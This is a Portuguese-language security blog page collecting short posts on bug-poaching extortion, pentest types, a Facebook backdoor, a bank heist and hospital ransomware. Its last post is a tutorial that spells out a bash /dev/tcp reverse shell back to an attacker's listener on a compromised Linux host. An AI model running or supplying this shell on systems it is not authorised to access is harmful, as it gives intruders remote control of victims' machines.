Bug poaching: Uma nova tática de extorsão cuja o alvo são empresas

Imagine que um ladrão entre na sua casa, mas não roube absolutamente nada, ao invés disso ele tira fotos de tudo que você tenha de valor em casa e vai embora. Alguns dias depois você recebe uma carta com todas as fotos tiradas pelo ladrão com a mensagem: “Se você quiser saber como eu entrei na sua casa, você terá de pagar um valor x.”

Na carta o ladrão não avisa se ele vai tentar invadir a sua casa novamente, ou se ele vai distribuir para outros ladrões as cópias das fotos que ele fez. Ele simplesmente diz para você pagar um valor x para que ele possa lhe dizer como ele entrou na sua casa.
Leia mais

Black box, white box ou gray box?

Quem trabalha na área de pentest sempre se depara com a pergunta: Qual tipo de pentest devo recomendar ao meu cliente? É claro que se o profissional for olhar apenas para o lado lucrativo da coisa, é óbvio que ele irá recomendar o black box. Afinal de contas esse é o tipo de teste que chega mais perto de um ataque real e por isso custa mais caro, sem falar que é o mais trabalhoso.
Mas e ai, será que a empresa realmente precisa de um black box, mesmo tendo ela condições financeiras de arcar com as despesas do teste?

A resposta é não, e vários fatores contribuem para isso.  Temos que entender que mesmo que a empresa tenha condições de arcar com as despesas, um teste black box é muito complexo e exigi muito tempo para ser realizado com eficácia. Como nenhum pentest é realizado por tempo indeterminado o teste black box pode não ser a melhor opção, mesmo sendo o tipo de teste que chega perto de um ataque real.

Leia mais

Hackers mostram como é fácil invadir uma estação de energia elétrica nos EUA

Uma companhia elétrica contratou um grupo de hackers éticos conhecidos como red team security para testar sua defesa. O vídeo abaixo mostra como eles fizeram para entrar na empresa e ter acesso total a sua rede. Parece cena de filme, mas é a pura realidade.

Hacker instalou uma backdoor em um dos servidores do facebook para roubar senhas

how-to-hack-facebook

O time de segurança do facebook descobriu recentemente que alguém, provavelmente um blackhat conseguiu comprometer um de seus servidores e instalou uma backdoor nele para poder roubar as credenciais de seus funcionários.
Segundo o facebook a backdoor foi encontrada no servidor corporativo e não no servidor principal onde ficam as contas dos usuário do facebook, segundo o próprio facebook os usuário não foram afetados.

Leia mais

Hackers roubaram 80 milhões de dólares de um banco que não tinha firewall

bank-firewall

Os investigadores do instituto de treinamento de forense de Bangladesh que estão investigando um roubo de 80 milhões de dólares de um banco, descobriram que os hackers conseguiram acesso a rede não pelo fato de eles terem conseguindo dar bypass no sistema de segurança do banco, mas sim pelo fato de que o banco estava usando switches de rede sem nenhum tipo de firewall. Quando você pensa que já viu de tudo…

Leia a materia na integra em: http://thehackernews.com/2016/04/bank-firewall-security.html

Usuário compra HD externo de 1TB da china que tem apenas 32GB de espaço

Se você comprou um disco rígido de 1 TB da China, é melhor você abrir para saber o que tem lá dentro. O usuário kingruudz do reddit.com descobriu que ele foi enganado por uma empresa chinesa que disse ter enviado um disco rígido de 1TB que na verdade tinha apenas 32GB de espaço. A foto abaixo mostra a gambiarra.

O post original pode ser visto em: https://www.reddit.com/r/funny/comments/47c2qe/when_you_buy_a_1tb_hard_disk_from_china_but_its/

Você conhece Hackerville?

Caso você nunca tenho ouvido falar de um lugar na Romênia chamado de Hackerville, o vídeo abaixo vai lhe explicar porque esse lugar ficou conhecido com esse nome. O vídeo foi feito pela Symantec.

Ransomware Proof of Concept dando Bypass no antivírus do windows

3 milhões de dólares em bitcoins

Mais uma vez o vírus ransomware ganhou destaque nas manchetes. Dessa vez o alvo foi o hospital The Hollywood Presbyterian Medical Center localizado em Los Angeles, eles tiveram seus dados criptografados e agora não conseguem acessar dados importantes de seus pacientes. Para liberar a senha que será usada para descriptografar esses dados os hackers estão pedindo uma bagatela de 3 milhões de dólares como resgate. Apesar do estrago que esses ransomware vem causando, a prevenção é muito simples: NÃO CLIQUE NAQUILO QUE VOCÊ NÃO SABE A PROCEDÊNCIA !!!!

P.S: Grandes sites como CNBC e a afiliada da NBC em Los Angeles reportaram que o valor do resgate foi de 3.7 milhões de dólares, sites menores estão dizendo que o valor não passou de 17 mil dólares. O próprio hospital emitiu uma nota dizendo que o valor pago pelo resgate foi de 17 mil dólares. O valor real pago ninguém sabe, o hospital pode ter emitido essa nota com valor inferior até mesmo para não incentivar outros ataques.

Netcat sem Netcat no linux

Por acaso você já conseguiu acesso a uma máquina rodando linux e ai você tentou rodar o netcat para fazer um shell reverso, mas se deparou por exemplo com o fato de que a máquina alvo não tinha o netcat instalado ou de repente você tentou instala-lo mas por algum motivo ele não funcionou?
Bom como todos sabemos geralmente ambientes linux tem o netcat instalado por padrão, mas você pode acabar se deparando com alguma máquina que esteja rodando linux mas não tem o netcat instalado. Os motivos para tal podem ser os mais diversos possíveis. Bom independente de qualquer coisa não se preocupe, existe diversas maneiras de usarmos o netcat sem ter o netcat instalado na máquina alvo. Abaixo segue uma das maneiras com que podemos fazer isso.
Bom a primeira coisa que precisamos fazer é rodar o netcat na nossa máquina e coloca-lo em em listen mode ou modo de escuta, para isso utilizamos o seguinte comando:

nc -n -v -l -p porta-desejada

Agora na máquina alvo utilizamos o seguinte comando:

/bin/bash -i > /dev/tcp/ip-da-máquina-do-atacante/porta-na-qual-o-necat-está-ouvindo-na-máquina-do-atacante 0<&1

O camando acima vai fazer com que a máquina alvo se conecte na máquina do atacante. Vale lembrar que o comando acima pode não funcionar em todas as distribuições linux, caso isso ocorra se vire nos 30.

Não sabe quem é esse tal de netcat? Well google it.